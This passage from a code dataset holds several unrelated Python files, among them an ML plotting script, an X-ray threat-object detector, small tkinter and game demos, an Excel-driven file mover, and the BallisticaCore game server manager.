'$\\\\beta_2$', '$\\\\beta_3$', '$\\\\beta_4$')\nfig, ax = plt.subplots()\nax.bar(range(z_dim), info_flow, color=[\n cols['rosso_corsa'], cols['rosso_corsa'], cols['bright_navy_blue'],\n cols['bright_navy_blue'], cols['bright_navy_blue'], cols['bright_navy_blue']])\nplt.xticks(range(z_dim), x_labels)\nax.yaxis.grid(linewidth='0.3')\nplt.ylabel('Information flow to $\\\\widehat{Y}$')\nplt.title('Information flow of individual causal factors')\nplt.savefig('./figs/fig_fmnist_quant_if.svg')\nplt.savefig('./figs/fig_fmnist_quant_if.pdf')\n\n#%% --- compute classifier accuracy ---\nclassifier_accuracy_original = np.zeros(z_dim)\nYhat = np.zeros((len(vaX)))\nYhat_reencoded = np.zeros((len(vaX)))\nYhat_aspectremoved = np.zeros((z_dim, len(vaX)))\n\nfor i_samp in range(len(vaX)):\n x = torch.from_numpy(vaX[i_samp:i_samp+1,:,:,:]).permute(0,3,1,2).float().to(device)\n Yhat[i_samp] = np.argmax(classifier(x)[0].cpu().detach().numpy())\n z = encoder(x)[0]\n xhat = decoder(z)\n Yhat_reencoded[i_samp] = np.argmax(classifier(xhat)[0].cpu().detach().numpy())\n for i_latent in range(z_dim): \n z = encoder(x)[0]\n z[0,i_latent] = torch.randn((1))\n xhat = decoder(z)\n Yhat_aspectremoved[i_latent,i_samp] = np.argmax(classifier(xhat)[0].cpu().detach().numpy())\n\nclassifier_accuracy = np.mean(vaY == Yhat)\nclassifier_accuracy_reencoded = np.mean(vaY == Yhat_reencoded)\nclassifier_accuracy_aspectremoved = np.zeros((z_dim))\nfor i in range(z_dim):\n classifier_accuracy_aspectremoved[i] = np.mean(vaY == Yhat_aspectremoved[i,:])\n\n# --- plot classifier accuracy ---\ncols = {'black' : [0.000, 0.000, 0.000],\n 'golden_poppy' : [1.000,0.761,0.039],\n 'bright_navy_blue' : [0.047,0.482,0.863],\n 'rosso_corsa' : [0.816,0.000,0.000]}\nx_labels = ('orig','reenc','$\\\\alpha_1$', '$\\\\alpha_2$', '$\\\\beta_1$', '$\\\\beta_2$',\n '$\\\\beta_3$', '$\\\\beta_4$')\nfig, ax = 
plt.subplots()\nax.yaxis.grid(linewidth='0.3')\nax.bar(range(z_dim+2), np.concatenate(([classifier_accuracy],\n [classifier_accuracy_reencoded],\n classifier_accuracy_aspectremoved)),\n color=[cols['black'], cols['black'], cols['rosso_corsa'],\n cols['rosso_corsa'], cols['bright_navy_blue'],\n cols['bright_navy_blue'], cols['bright_navy_blue'],\n cols['bright_navy_blue']])\nplt.xticks(range(z_dim+2), x_labels)\nplt.ylim((0.2,1.0))\nplt.yticks((0.2,0.4,0.6,0.8,1.0))#,('0.5','','0.75','','1.0'))\nplt.ylabel('Classifier accuracy')\nplt.title('Classifier accuracy after removing aspect')\nplt.savefig('./figs/fig_fmnist_quant_accuracy.svg')\nplt.savefig('./figs/fig_fmnist_quant_accuracy.pdf')","sub_path":"make_fmnist_quant.py","file_name":"make_fmnist_quant.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"170326209","text":"try:\n import setuptools\nexcept:\n print('you should have setuptools installed (http://pypi.python.org/pypi/setuptools), for some Linux distribs you can get it via [sudo] apt-get install python-setuptools')\n print('press Enter for exit...')\n input()\n exit()\n\nimport os, sys\n(filepath, filename) = os.path.split(__file__)\n\nfor moduleName in ['DerApproximator', 'FuncDesigner', 'OpenOpt', 'SpaceFuncs']:\n print(moduleName + ' installation:')\n os.chdir(((filepath + os.sep) if filepath != '' else '') + moduleName)\n os.system('\\\"%s\\\" setup.py install' % sys.executable)\n #os.system('%s setup.py install' % sys.executable)\n os.chdir('..')\n\n","sub_path":"install_all.py","file_name":"install_all.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"274196509","text":"import os\nfrom typing import Tuple\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport torch\nfrom torchvision.models.detection import fasterrcnn_resnet50_fpn\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.ops import nms\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\n\nfrom svlib.svtools import svtools as svt\n\nlog = svt.log\n\n\nclass ThreatPredictor:\n\n def __init__(\n self,\n path_model: str,\n model_name: str,\n kafka_input_topic: str,\n kafka_output_topic: str\n ) -> None:\n self.path_model = path_model\n self.model_name = model_name\n self.kafka_input_topic = kafka_input_topic\n self.kafka_output_topic = kafka_output_topic\n self.kafka_helper = svt.kafka\n self.device = torch.device('cpu')\n self.model = self.load_model()\n self.classes = {\n 0: 'backGround',\n 1: 'Knife',\n 2: 'Gun',\n 3: 'Wrench',\n 4: 'Pliers',\n 5: 'Scissors'\n }\n self.tp_schema_helper = svt.schema.create_helper('ThreatPrediction')\n\n def load_model(self):\n \"\"\"\"\"\"\n model = fasterrcnn_resnet50_fpn(pretrained=False,\n pretrained_backbone=False)\n # ['Knife', 'Gun', 'Wrench', 'Pliers', 'Scissors'] + background\n num_classes = 6\n # get number of input features for the classifier\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n # replace the pre-trained head with a new one\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features,\n num_classes)\n # Load the trained weights\n path_model = os.path.join(os.getcwd(), self.path_model,\n self.model_name)\n model.load_state_dict(torch.load(\n path_model, map_location=self.device\n ))\n model.eval()\n model.to(self.device)\n\n return model\n\n def 
predict_image(self, path_image: str) -> Tuple:\n \"\"\"\n\n :param path_image:\n :return:\n \"\"\"\n log.info(f\"Received a scanned X-ray image at path: {path_image}\")\n\n image = Image.open(path_image)\n image = np.array(image).astype(np.float32)\n image /= 255.0\n sample = A.Compose([ToTensorV2(p=1.0)])(**{'image': image})\n image = sample['image']\n image.to(self.device)\n # add a batch a dimension\n image = image.unsqueeze(0)\n\n output = self.model(image)\n\n # CODE FOR THE NMS COMMENT OUT IF NOT NEEDED\n new_output = []\n\n for idx, output_ in enumerate(output):\n preds = output[idx]['boxes']\n scores = output[idx]['scores']\n keep = nms(preds, scores, 0.5)\n new_dict = {'boxes': output[idx]['boxes'][keep],\n 'scores': output[idx]['scores'][keep],\n 'labels': output[idx]['labels'][keep],\n }\n new_output.append(new_dict)\n output = new_output\n # CODE FOR THE NMS\n\n # get all predicted class names\n pred_classes = np.array([\n self.classes[i] for i in output[0]['labels'].cpu().numpy()\n ])\n detection_threshold = 0.5\n # get scores and bounding boxes for all predicted objects\n boxes = output[0]['boxes'].data.cpu().numpy()\n scores = output[0]['scores'].data.cpu().numpy()\n # x, y, w, h\n boxes[:, 2] = boxes[:, 2] - boxes[:, 0]\n boxes[:, 3] = boxes[:, 3] - boxes[:, 1]\n\n pred_classes = pred_classes[scores >= detection_threshold].tolist()\n boxes = boxes[scores >= detection_threshold].astype(np.int32).tolist()\n scores = scores[scores >= detection_threshold].tolist()\n\n return pred_classes, boxes, scores\n\n def draw_bounding_boxes(\n self,\n path_image: str,\n boxes: list,\n output_image_path: str\n ) -> None:\n \"\"\"\n\n :param path_image:\n :param boxes:\n :param output_image_path:\n :return:\n \"\"\"\n image = cv2.imread(path_image)\n # convert back to numpy\n boxes = np.array(boxes)\n # x1, y1, x2, y2\n boxes[:, 2] = boxes[:, 2] + boxes[:, 0]\n boxes[:, 3] = boxes[:, 3] + boxes[:, 1]\n\n for box in boxes:\n cv2.rectangle(image, (box[0], box[1]), (box[2], box[3]),\n (0, 0, 255), 3)\n\n cv2.imwrite(output_image_path, image)\n\n def get_threat_prediction_schema(\n self,\n message: dict,\n predictions: dict\n ) -> dict:\n \"\"\"\n\n :param message:\n :param predictions:\n :return:\n \"\"\"\n threat_prediction = {\n \"version\": \"1.0.0\",\n \"producerID\": message[\"producerID\"],\n \"modelName\": self.model_name.split(\".pth\")[0],\n \"imageID\": message[\"imageID\"],\n \"imagePath\": message[\"imagePath\"],\n \"predictionTS\": svt.chrono.now_as_str(),\n }\n threat_prediction.update(predictions)\n\n return threat_prediction\n\n def detect_threat(self, message: dict) -> None:\n \"\"\"\n\n :param message:\n :return:\n \"\"\"\n path_image = os.path.join(message['imagePath'], message['imageID'])\n\n pred_classes, boxes, scores = self.predict_image(path_image)\n\n # log.info(f\"Detected classes: {pred_classes}\\n\")\n # log.info(f\"Predicted scores: {scores}\\n\")\n # log.info(f\"Predicted bounding boxes: {boxes}\\n\")\n # No drawing of bounding boxes on the image if there is no threat\n if pred_classes:\n parts = message[\"imageID\"].split('.')\n oip = os.path.join(\"predictions\", parts[0] + '_bbox.' 
+ parts[1])\n self.draw_bounding_boxes(path_image, boxes, oip)\n else:\n oip = \"\"\n\n predictions = {\n \"prediction\": True if pred_classes else False,\n \"numberOfThreats\": len(pred_classes),\n \"outputImagePath\": oip,\n \"predictedObjects\": pred_classes,\n \"boundingBoxes\": boxes,\n \"confidenceScores\": scores\n }\n threat_prediction = self.get_threat_prediction_schema(message,\n predictions)\n log.info(threat_prediction)\n self.tp_schema_helper.validate(threat_prediction)\n self.kafka_helper.publish(self.kafka_output_topic, threat_prediction)\n\n def get_scanned_images(self) -> None:\n \"\"\"\"\"\"\n self.kafka_helper.consume_forever(\n group_id='threat_predictor',\n topics=[self.kafka_input_topic],\n callback_functions=[self.detect_threat]\n )\n\n\nif __name__ == '__main__':\n cr = svt.conf\n app_conf = cr.parse_yaml(\n os.path.join(os.getcwd(), 'configs', 'app_config.yaml')\n )['threat_predictor']\n\n tp = ThreatPredictor(**app_conf)\n\n tp.get_scanned_images()\n","sub_path":"source/components/threat_predictor/threat_predictor.py","file_name":"threat_predictor.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"155612317","text":"from tkinter import *\nfrom tkinter import ttk\n\nclass App:\n def __init__(self, master):\n self.master = master\n self.initWidgets()\n \n def initWidgets(self):\n bm = PhotoImage(file = 'images/test.png')\n self.label = ttk.Label(self.master, \n text='This is for testing!', \n image=bm, \n font=('StSong', 20, 'bold'), \n foreground='red')\n self.label.bm = bm\n self.label['compound'] = None\n self.label.pack()\n\n f = ttk.Frame(self.master)\n f.pack(fill=BOTH, expand=YES)\n compounds = ('None', 'LEFT', 'RIGHT', 'TOP', 'BOTTOM', 'CENTER')\n #定义一个StringVar变量,用作绑定Radiobutton的变量\n self.var = StringVar()\n self.var.set('None')\n for val in compounds:\n rb = Radiobutton(f, \n text=val, \n padx=20, \n variable=self.var, \n command=self.change_compound, \n value=val).pack(side=LEFT, anchor=CENTER)\n \n def change_compound(self):\n self.label['compound'] = self.var.get().lower()\n\nroot = Tk()\nroot.title('Compound测试')\nApp(root)\nroot.mainloop()","sub_path":"C11_GUI/11.5_compound_test.py","file_name":"11.5_compound_test.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"53579098","text":"from nannon.logic import *\nfrom functools import reduce\n\n################################################################################\n\n ###########\n # PLAYERS #\n ###########\n\n# Returns the result of making a random move.\ndef rand_play(pos, roll):\n move = random.choice(legal_moves(pos, roll))\n return make_move(pos, move, roll)\n\n# Prints board, shows legal moves, and queries the user for input.\ndef human(pos, roll):\n lm = legal_moves(pos, roll)\n print_board(pos)\n print('You rolled:', roll)\n print('Legal moves:', lm)\n move = int(input('Your move? 
'))\n if move not in lm:\n print('Try again.')\n human(pos, roll)\n return make_move(pos, move, roll)\n\n# Returns the position resulting from moving the furthest forward piece.\n# We can do this because the tuple will always be sorted.\ndef first_play(pos, roll):\n move = legal_moves(pos, roll)[-1]\n return make_move(pos, move, roll)\n\n# Returns the position resulting from moving the furthest back piece.\ndef last_play(pos, roll):\n move = legal_moves(pos, roll)[0]\n return make_move(pos, move, roll)\n\n# For each legal move, sums the scores for each player.\n# Appends the move along with the score to a list.\n# Returns the result of making the move with the highest score value.\ndef score_play(pos, roll):\n candidates = []\n for move in legal_moves(pos, roll):\n me, you = make_move(pos, move, roll)\n me_score = reduce(lambda x, y: x + y, me)\n you_score = reduce(lambda x, y: x + y, you)\n candidates.append((move, me_score - you_score))\n best_move, _ = max(candidates, key=lambda x: x[1])\n return make_move(pos, best_move, roll)\n\n# You may choose to implement new players below\n","sub_path":"nannon/.ipynb_checkpoints/players-checkpoint.py","file_name":"players-checkpoint.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"213027234","text":"s = input()\n\ns = s.upper()\n\ns = sorted(s)\n\ncount = {}\n\nfor i in s:\n try: count[i] += 1\n except: count[i]=1\n\nresult = [k for k, v in count.items() if max(count.values()) == v]\n\nif len(result) == 1:\n print(*result)\nelse:\n print('?')","sub_path":"5주차/심재민/[3주차] 하나하나.py","file_name":"[3주차] 하나하나.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"407223947","text":"\n__author__ = \"Nitin U.\"\n\n\"\"\" file_mover.py: The purpose of this program is to read an excel spreadsheet\nthen from that spreadsheet it will move the files from a source folder to a \ndestination folder. The source and the destination folder will be in 2 different\ncolumns. It will also check if the destination folder exists or not. if does \nnot exist then it will create that folder \"\"\"\n\n\"\"\" \nSteps\n1. Read the excel file and then access the sheet\n2. Create 2 lists 1 for source and 1 for destination\n3. Loop through the column and create the folders if they don't exist\n4. 
Move the files from the source location to target using shutil library \n\n\"\"\"\n\nimport os\nimport shutil\nimport glob\nimport xlrd\n\n \n# Parent Directory path \nparent_dir = r\"C:\\\\Users\\\\nitin\\\\Dropbox (Personal)\\\\Swinburne Statistics\\\\STA70005-Survey Sampling\\\\2020\\\\files\\\\pdf - Copy\\\\\"\n\n# Directory to be created under the parent directory\n\ndef create_directory(par_dir, dir):\n path = os.path.join(par_dir, dir) \n os.mkdir(path) \n \n\ndef check_if_exists(par_dir, dir):\n\n \"\"\" This function will check whether the specified path is an existing directory or not this will return a list \"\"\"\n \n path = os.path.join(par_dir, dir)\n \n isdir = os.path.isdir(path) \n \n return isdir\n \ndef get_file_names(folder_name):\n \n \"\"\" This will get the full path of all the files in the folder \"\"\"\n \n file_path_list = glob.glob(folder_name)\n \n return file_path_list \n\n\ndef main():\n \n file_to_read_from = r\"C:\\Users\\nitin\\Dropbox (Personal)\\Swinburne Statistics\\STA70005-Survey Sampling\\2020\\Output.xlsx\"\n \n book = xlrd.open_workbook(file_to_read_from)\n \n sheet = book.sheet_by_name(\"Sheet1\")\n \n for i in range(1, len(sheet.col(0))):\n\n src_file = sheet.row(i)[0].value # column 0: this column contains all the original path of the files.\n dest_folder = sheet.row(i)[7].value # column 7: this column contains the full path of the destination folder NOT THE FILES, only Folders\n folder = sheet.row(i)[6].value # column 6: this column contains the name of the destination folder\n\n try:\n if check_if_exists(parent_dir, folder) == True:\n\n print(\"Directory '% s' already exists under the parent directory chutiye\" % folder)\n\n else:\n\n create_directory(parent_dir, folder)\n print(\"===========================\") \n print(\"Directory '% s' created under the parent directory\" % folder) \n print(\"===========================\") \n\n shutil.move(r\"\"+src_file, r\"\"+str(dest_folder))\n\n print(\"file % s moved\" % src_file)\n\n except Exception as why:\n \n print(why)\n\n \nif __name__ == \"__main__\":\n main()\n ","sub_path":"file_mover.py","file_name":"file_mover.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"310224840","text":"import numpy as np\n\nn =100 \ncluster1x = np.random.uniform(5, 10, n)\ncluster1y = np.random.uniform(5, 10, n)\ncluster1z = np.random.uniform(5, 10, n)\nlabel1 = np.full((n,),1)\ncluster1 = np.column_stack((cluster1x, cluster1y, cluster1z, label1))\n\ncluster2x = np.random.uniform(-10, -5, n)\ncluster2y = np.random.uniform(-10, -5, n)\ncluster2z = np.random.uniform(-10, -5, n)\nlabel2 = np.full((n,),2)\ncluster2 = np.column_stack((cluster2x, cluster2y, cluster2z, label2))\n\ncluster3x = np.random.uniform(-20, -15, n)\ncluster3y = np.random.uniform(7, 10, n)\ncluster3z = np.random.uniform(7, 10, n)\nlabel3 = np.full((n,),3)\ncluster3 = np.column_stack((cluster3x, cluster3y, cluster3z, label3))\n\ndata = np.row_stack((cluster1, cluster2, cluster3))\nnp.random.shuffle(data)\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection = '3d')\nax.scatter(cluster1x, cluster1y, cluster1z,c='blue')\nax.scatter(cluster2x, cluster2y, cluster2z,c='red')\nax.scatter(cluster3x, cluster3y, cluster3z,c='green')\nplt.show()\n\nfrom sklearn.linear_model import LogisticRegression as MaxEnt\nfrom sklearn.cross_validation import train_test_split\nX,y = 
np.hsplit(data,[3])\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n#print(data)\n#print(X_train)\n#print(X_test)\n#print(y_train)\n#print(y_test)\nclassifier = MaxEnt()\nclassifier.fit(X_train, y_train)\npreds = classifier.predict(X_test)\nif n < 5:\n print(preds)\n print(y_test)\nfrom sklearn.metrics import accuracy_score\nprint(accuracy_score(preds, y_test))\n","sub_path":"maxent_example.py","file_name":"maxent_example.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254940015","text":"#!/usr/bin/env python3.8\n# Released under the MIT License. See LICENSE for details.\n#\n\"\"\"BallisticaCore server manager.\"\"\"\nfrom __future__ import annotations\n\nimport json\nimport os\nimport signal\nimport subprocess\nimport sys\nimport time\nfrom pathlib import Path\nfrom threading import Lock, Thread, current_thread\nfrom typing import TYPE_CHECKING\n\n# We make use of the bacommon and efro packages as well as site-packages\n# included with our bundled Ballistica dist, so we need to add those paths\n# before we import them.\nsys.path += [\n str(Path(Path(__file__).parent, 'dist', 'ba_data', 'python')),\n str(Path(Path(__file__).parent, 'dist', 'ba_data', 'python-site-packages'))\n]\n\nfrom bacommon.servermanager import ServerConfig, StartServerModeCommand\nfrom efro.dataclasses import dataclass_from_dict, dataclass_validate\nfrom efro.error import CleanError\nfrom efro.terminal import Clr\n\nif TYPE_CHECKING:\n from typing import Optional, List, Dict, Union, Tuple\n from types import FrameType\n from bacommon.servermanager import ServerCommand\n\nVERSION_STR = '1.1.1'\n\n# Version history:\n# 1.1.1:\n# Switched config reading to use efro.dataclasses.dataclass_from_dict()\n# 1.1.0:\n# Added shutdown command\n# Changed restart to default to immediate=True\n# Added clean_exit_minutes, unclean_exit_minutes, and idle_exit_minutes\n# 1.0.0:\n# Initial release\n\n# How many seconds we wait after asking our subprocess to do an immediate\n# shutdown before bringing down the hammer.\nIMMEDIATE_SHUTDOWN_TIME_LIMIT = 5.0\n\n\nclass ServerManagerApp:\n \"\"\"An app which manages BallisticaCore server execution.\n\n Handles configuring, launching, re-launching, and otherwise\n managing BallisticaCore operating in server mode.\n \"\"\"\n\n def __init__(self) -> None:\n try:\n self._config = self._load_config()\n except Exception as exc:\n raise CleanError(f'Error loading config: {exc}') from exc\n self._wrapper_shutdown_desired = False\n self._done = False\n self._subprocess_commands: List[Union[str, ServerCommand]] = []\n self._subprocess_commands_lock = Lock()\n self._subprocess_force_kill_time: Optional[float] = None\n self._restart_minutes: Optional[float] = None\n self._running_interactive = False\n self._subprocess: Optional[subprocess.Popen[bytes]] = None\n self._launch_time = time.time()\n self._subprocess_launch_time: Optional[float] = None\n self._subprocess_sent_auto_restart = False\n self._subprocess_sent_clean_exit = False\n self._subprocess_sent_unclean_exit = False\n self._subprocess_thread: Optional[Thread] = None\n\n # If we don't have any explicit exit conditions set,\n # we run indefinitely (though we restart our subprocess\n # periodically to clear out leaks/cruft)\n if (self._config.clean_exit_minutes is None\n and self._config.unclean_exit_minutes is None\n and self._config.idle_exit_minutes is None):\n self._restart_minutes = 360.0\n\n @property\n def config(self) -> 
ServerConfig:\n \"\"\"The current config for the app.\"\"\"\n return self._config\n\n @config.setter\n def config(self, value: ServerConfig) -> None:\n dataclass_validate(value)\n self._config = value\n\n @property\n def restart_minutes(self) -> Optional[float]:\n \"\"\"The time between automatic server restarts.\n\n Restarting the server periodically can minimize the effect of\n memory leaks or other built-up cruft.\n \"\"\"\n return self._restart_minutes\n\n def run_interactive(self) -> None:\n \"\"\"Run the app loop to completion.\"\"\"\n import code\n\n if self._running_interactive:\n raise RuntimeError('Already running interactively.')\n self._running_interactive = True\n\n # Print basic usage info in interactive mode.\n if sys.stdin.isatty():\n if __debug__:\n modestr = '(debug mode)'\n else:\n modestr = '(opt mode)'\n print(f'{Clr.CYN}{Clr.BLD}BallisticaCore server'\n f' manager {VERSION_STR}'\n f' starting up {modestr}...{Clr.RST}\\n'\n f'{Clr.CYN}Use the \"mgr\" object to make'\n f' live server adjustments.\\n'\n f'Type \"help(mgr)\" for more information.{Clr.RST}')\n\n # Python will handle SIGINT for us (as KeyboardInterrupt) but we\n # need to register a SIGTERM handler so we have a chance to clean\n # up our subprocess when someone tells us to die. (and avoid\n # zombie processes)\n signal.signal(signal.SIGTERM, self._handle_term_signal)\n\n # Fire off a background thread to wrangle our server binaries.\n self._subprocess_thread = Thread(target=self._bg_thread_main)\n self._subprocess_thread.start()\n\n context = {'__name__': '__console__', '__doc__': None, 'mgr': self}\n\n # Enable tab-completion if possible.\n self._enable_tab_completion(context)\n\n # Now just sit in an interpreter.\n # TODO: make it possible to use IPython if the user has it available.\n try:\n code.interact(local=context, banner='', exitmsg='')\n except SystemExit:\n # We get this from the builtin quit(), etc.\n # Need to catch this so we can clean up, otherwise we'll be\n # left in limbo with our process thread still running.\n pass\n except BaseException as exc:\n print(f'{Clr.SRED}Unexpected interpreter exception:'\n f' {exc} ({type(exc)}){Clr.RST}')\n\n print(f'{Clr.CYN}Server manager shutting down...{Clr.RST}')\n\n if self._subprocess_thread.is_alive():\n print(f'{Clr.CYN}Waiting for subprocess exit...{Clr.RST}')\n\n # Mark ourselves as shutting down and wait for the process to wrap up.\n self._done = True\n self._subprocess_thread.join()\n\n def cmd(self, statement: str) -> None:\n \"\"\"Exec a Python command on the current running server subprocess.\n\n Note that commands are executed asynchronously and no status or\n return value is accessible from this manager app.\n \"\"\"\n if not isinstance(statement, str):\n raise TypeError(f'Expected a string arg; got {type(statement)}')\n with self._subprocess_commands_lock:\n self._subprocess_commands.append(statement)\n self._block_for_command_completion()\n\n def _block_for_command_completion(self) -> None:\n # Ideally we'd block here until the command was run so our prompt would\n # print after it's results. We currently don't get any response from\n # the app so the best we can do is block until our bg thread has sent\n # it. 
In the future we can perhaps add a proper 'command port'\n # interface for proper blocking two way communication.\n while True:\n with self._subprocess_commands_lock:\n if not self._subprocess_commands:\n break\n time.sleep(0.1)\n\n # One last short delay so if we come out *just* as the command is sent\n # we'll hopefully still give it enough time to process/print.\n time.sleep(0.1)\n\n def screenmessage(self,\n message: str,\n color: Optional[Tuple[float, float, float]] = None,\n clients: Optional[List[int]] = None) -> None:\n \"\"\"Display a screen-message.\n\n This will have no name attached and not show up in chat history.\n They will show up in replays, however (unless clients is passed).\n \"\"\"\n from bacommon.servermanager import ScreenMessageCommand\n self._enqueue_server_command(\n ScreenMessageCommand(message=message, color=color,\n clients=clients))\n\n def chatmessage(self,\n message: str,\n clients: Optional[List[int]] = None) -> None:\n \"\"\"Send a chat message from the server.\n\n This will have the server's name attached and will be logged\n in client chat windows, just like other chat messages.\n \"\"\"\n from bacommon.servermanager import ChatMessageCommand\n self._enqueue_server_command(\n ChatMessageCommand(message=message, clients=clients))\n\n def clientlist(self) -> None:\n \"\"\"Print a list of connected clients.\"\"\"\n from bacommon.servermanager import ClientListCommand\n self._enqueue_server_command(ClientListCommand())\n self._block_for_command_completion()\n\n def kick(self, client_id: int, ban_time: Optional[int] = None) -> None:\n \"\"\"Kick the client with the provided id.\n\n If ban_time is provided, the client will be banned for that\n length of time in seconds. If it is None, ban duration will\n be determined automatically. Pass 0 or a negative number for no\n ban time.\n \"\"\"\n from bacommon.servermanager import KickCommand\n self._enqueue_server_command(\n KickCommand(client_id=client_id, ban_time=ban_time))\n\n def restart(self, immediate: bool = True) -> None:\n \"\"\"Restart the server subprocess.\n\n This can be necessary for some config changes to take effect.\n By default, the server will exit immediately. If 'immediate' is passed\n as False, however, the server will instead exit at the next clean\n transition point (end of a series, etc).\n \"\"\"\n from bacommon.servermanager import ShutdownCommand, ShutdownReason\n self._enqueue_server_command(\n ShutdownCommand(reason=ShutdownReason.RESTARTING,\n immediate=immediate))\n\n # If we're asking for an immediate restart but don't get one within\n # the grace period, bring down the hammer.\n if immediate:\n self._subprocess_force_kill_time = (time.time() +\n IMMEDIATE_SHUTDOWN_TIME_LIMIT)\n\n def shutdown(self, immediate: bool = True) -> None:\n \"\"\"Shut down the server subprocess and exit the wrapper\n\n By default, the server will exit immediately. 
If 'immediate' is passed\n as False, however, the server will instead exit at the next clean\n transition point (end of a series, etc).\n \"\"\"\n from bacommon.servermanager import ShutdownCommand, ShutdownReason\n self._enqueue_server_command(\n ShutdownCommand(reason=ShutdownReason.NONE, immediate=immediate))\n\n # An explicit shutdown means we know to bail completely once this\n # subprocess completes.\n self._wrapper_shutdown_desired = True\n\n # If we're asking for an immediate shutdown but don't get one within\n # the grace period, bring down the hammer.\n if immediate:\n self._subprocess_force_kill_time = (time.time() +\n IMMEDIATE_SHUTDOWN_TIME_LIMIT)\n\n def _load_config(self) -> ServerConfig:\n user_config_path = 'config.yaml'\n\n if os.path.exists(user_config_path):\n import yaml\n with open(user_config_path) as infile:\n user_config_raw = yaml.safe_load(infile.read())\n\n # An empty config file will yield None, and that's ok.\n if user_config_raw is not None:\n return dataclass_from_dict(ServerConfig, user_config_raw)\n\n # Go with defaults if we weren't able to load anything.\n return ServerConfig()\n\n def _enable_tab_completion(self, locs: Dict) -> None:\n \"\"\"Enable tab-completion on platforms where available (linux/mac).\"\"\"\n try:\n import readline\n import rlcompleter\n readline.set_completer(rlcompleter.Completer(locs).complete)\n readline.parse_and_bind('tab:complete')\n except ImportError:\n # This is expected (readline doesn't exist under windows).\n pass\n\n def _bg_thread_main(self) -> None:\n \"\"\"Top level method run by our bg thread.\"\"\"\n while not self._done:\n self._run_server_cycle()\n\n def _handle_term_signal(self, sig: int, frame: FrameType) -> None:\n \"\"\"Handle signals (will always run in the main thread).\"\"\"\n del sig, frame # Unused.\n raise SystemExit()\n\n def _run_server_cycle(self) -> None:\n \"\"\"Spin up the server subprocess and run it until exit.\"\"\"\n\n self._prep_subprocess_environment()\n\n # Launch the binary and grab its stdin;\n # we'll use this to feed it commands.\n self._subprocess_launch_time = time.time()\n\n # Set an environment var so the server process knows its being\n # run under us. This causes it to ignore ctrl-c presses and other\n # slight behavior tweaks. 
Hmm; should this be an argument instead?\n os.environ['BA_SERVER_WRAPPER_MANAGED'] = '1'\n\n print(f'{Clr.CYN}Launching server subprocess...{Clr.RST}')\n binary_name = ('ballisticacore_headless.exe'\n if os.name == 'nt' else './ballisticacore_headless')\n self._subprocess = subprocess.Popen(\n [binary_name, '-cfgdir', 'ba_root'],\n stdin=subprocess.PIPE,\n cwd='dist')\n\n # Do the thing.\n # No matter how this ends up, make sure the process is dead after.\n try:\n self._run_subprocess_until_exit()\n finally:\n self._kill_subprocess()\n\n # If we want to die completely after this subprocess has ended,\n # tell the main thread to die.\n if self._wrapper_shutdown_desired:\n\n # Only do this if the main thread is not already waiting for\n # us to die; otherwise it can lead to deadlock.\n if not self._done:\n self._done = True\n\n # This should break the main thread out of its blocking\n # interpreter call.\n os.kill(os.getpid(), signal.SIGTERM)\n\n def _prep_subprocess_environment(self) -> None:\n \"\"\"Write files that must exist at process launch.\"\"\"\n os.makedirs('dist/ba_root', exist_ok=True)\n if os.path.exists('dist/ba_root/config.json'):\n with open('dist/ba_root/config.json') as infile:\n bincfg = json.loads(infile.read())\n else:\n bincfg = {}\n\n # Some of our config values translate directly into the\n # ballisticacore config file; the rest we pass at runtime.\n bincfg['Port'] = self._config.port\n bincfg['Auto Balance Teams'] = self._config.auto_balance_teams\n bincfg['Show Tutorial'] = False\n bincfg['Idle Exit Minutes'] = self._config.idle_exit_minutes\n with open('dist/ba_root/config.json', 'w') as outfile:\n outfile.write(json.dumps(bincfg))\n\n def _enqueue_server_command(self, command: ServerCommand) -> None:\n \"\"\"Enqueue a command to be sent to the server.\n\n Can be called from any thread.\n \"\"\"\n with self._subprocess_commands_lock:\n self._subprocess_commands.append(command)\n\n def _send_server_command(self, command: ServerCommand) -> None:\n \"\"\"Send a command to the server.\n\n Must be called from the server process thread.\n \"\"\"\n import pickle\n assert current_thread() is self._subprocess_thread\n assert self._subprocess is not None\n assert self._subprocess.stdin is not None\n val = repr(pickle.dumps(command))\n assert '\\n' not in val\n execcode = (f'import ba._servermode;'\n f' ba._servermode._cmd({val})\\n').encode()\n self._subprocess.stdin.write(execcode)\n self._subprocess.stdin.flush()\n\n def _run_subprocess_until_exit(self) -> None:\n assert current_thread() is self._subprocess_thread\n assert self._subprocess is not None\n assert self._subprocess.stdin is not None\n\n # Send the initial server config which should kick things off.\n # (but make sure its values are still valid first)\n dataclass_validate(self._config)\n self._send_server_command(StartServerModeCommand(self._config))\n\n while True:\n\n # If the app is trying to shut down, nope out immediately.\n if self._done:\n break\n\n # Pass along any commands to our process.\n with self._subprocess_commands_lock:\n for incmd in self._subprocess_commands:\n # If we're passing a raw string to exec, no need to wrap it\n # in any proper structure.\n if isinstance(incmd, str):\n self._subprocess.stdin.write((incmd + '\\n').encode())\n self._subprocess.stdin.flush()\n else:\n 